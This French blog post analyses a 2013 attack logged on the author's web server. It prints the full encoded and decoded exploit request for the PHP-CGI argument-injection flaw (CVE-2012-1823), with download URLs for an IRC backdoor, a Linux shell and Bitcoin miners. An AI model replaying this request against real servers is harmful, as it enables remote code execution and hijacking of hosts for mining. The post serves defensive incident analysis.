Attaque Web – BitCoin et PHP Shell

Aujourd’hui, la seconde attaque venant d’une IP OVH a attiré mon attention : http://www.malekal.com/modsec/index.php?ip=37.187.77.137

Attaques_WEB_Bitcoin Attaques_WEB_Bitcoin2

 

L’exploit se situe là :

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Décodé on obtient :
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

C’est un exploit qui tire parti d’une vulnérabilité PHP-CGI de Mai 2012 : http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

Du côté des éléments qui sont télécharges et exécutés, on obtient :

http://74.52.9.186/c
http:/74.52.9.186/lol
http://74.52.9.186/x.exe

http://update.cc.st/c  (82.165.130.162)
http:/update.cc.st/lol
http://update.cc.st/x.exe

NetRange: 74.52.0.0 – 74.55.255.255
CIDR: 74.52.0.0/14
OriginAS: AS36420, AS30315, AS13749, AS21844
NetName: NETBLK-THEPLANET-BLK-14
NetHandle: NET-74-52-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-02-17
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-74-52-0-0-1

inetnum: 82.165.128.0 – 82.165.143.255
netname: SCHLUND-CUSTOMERS
descr: 1&1 Internet AG
country: DE
admin-c: IPAD-RIPE
tech-c: IPOP-RIPE
remarks: INFRA-AW
remarks: in case of abuse or spam, please mailto: abuse@oneandone.net
status: ASSIGNED PA
mnt-by: AS8560-MNT
mnt-lower: AS8560-MNT
mnt-domains: AS8560-MNT
mnt-routes: AS8560-MNT
source: RIPE # Filtered

bot est une PHP IRC-Backdoor pour Windows avec des fonctionnalités DoS : http://pjjoint.malekal.com/files.php?read=20131109_r5x6n9m8q12
Apparemment, y a pas grand monde sur le channel.
Sont petit est nom est : Backdoor.PHP.Pbot.A

https://www.virustotal.com/en/file/40ef8427bec53d05194988be086390d75c4ab4e003524191afe5f484d37e2da6/analysis/1384026769/

SHA256:40ef8427bec53d05194988be086390d75c4ab4e003524191afe5f484d37e2da6
File name:bot
Detection ratio:12 / 47
Analysis date:2013-11-09 19:52:49 UTC ( 0 minutes ago )

lol est un binaire Linux qui semble être aussi un Shell.
La détection est pas terrible, on tombe sur du 3/47 : http://malwaredb.malekal.com/index.php?hash=5d0b6cb42b254643c7f0759c41414104

x.exe est un client Bitcoin pour Windows : https://www.virustotal.com/en/file/f70f13232fec2ae5c526b04bbaa455dec0675d32a1068f1c045f6fe92192d53d/analysis/

SHA256:f70f13232fec2ae5c526b04bbaa455dec0675d32a1068f1c045f6fe92192d53d
File name:x.exe
Detection ratio:25 / 47
Analysis date:2013-11-08 14:35:57 UTC ( 1 day, 5 hours ago )

il y a aussi un Bitcoin pour Linux : http://malwaredb.malekal.com/index.php?hash=8bcf90e5f865acd004a43f2ba891534b

https://www.virustotal.com/en/file/5be08c4002571d7b8ad03fabef81494d276c2fdd6857c89f7dad88d472acb9b0/analysis/1384024764/

 

SHA256:5be08c4002571d7b8ad03fabef81494d276c2fdd6857c89f7dad88d472acb9b0
File name:clamav
Detection ratio:3 / 47
Analysis date:2013-11-09 19:19:24 UTC ( 0 minutes ago )

Attaques_WEB_Bitcoin3

mine.cc.st est en fastflux :

malekalmorte@MaK-tux:/tmp/attack$ host mine.cc.st
mine.cc.st has address 66.85.187.134
mine.cc.st has address 46.105.55.208
malekalmorte@MaK-tux:/tmp/attack$ host mine.cc.st
mine.cc.st has address 46.105.55.208
mine.cc.st has address 66.85.187.134

Cette attaque est plutôt originale par rapport aux traditionnels RFI qui ballourde un fichier d’upload ou un PHP Shell : http://www.malekal.com/2013/10/03/attaques-rfi-remote-file-include-sur-wordpress/
Je vais envoyer quelques mails aux abuses 🙂

EDIT

is that you ?

bla-DoS

Sécuriser son site WEB

Vous pouvez aussi jeter un oeil à la page : [réseau] Sécuriser un serveur Apache/PHP/MySQL (LAMP) et l’index menant à différentes ressources pour sécuriser son site WEB

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 110 times, 1 visits today)

2 thoughts on “Attaque Web – BitCoin et PHP Shell

  1. Même soucis. Depuis l’ip 46.36.37.35.

    J’ai mis du temps à comprendre ce qui se passait exactement car je m’attendais à une modification des fichiers PHP, pas à une exécution directe du code via CGI. Merci pour la confirmation

  2. UXXchilar Qurultoy qilmay qudyimi?yana xalq harakatimish? 1 yilda xalq hammasi yoq bulib qolar ekanda,ana juda qiziq xalq harakati ekanda naxodki 30million aholi bir yilga bormay yoq bulib qolsa?judaaa Solih janoblari Inshaaloh oz qoldi xalq hammasi biz bilan deb qiqrab yurardi,UXXchilar barbir bilaman meni izohimni zamondosh saytiga kirib uqiysizlar….etiboringiz uchun rahmat sizlar shu xalq nomini saytlaringizdan olib tashab ChalaSolih harakati deb nom beringlar,xalqni nomidan chiqib qilib,uzbek xalqini ham obrusini yoq qildinglar?Nazirov AntiSolih-harakati!!!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *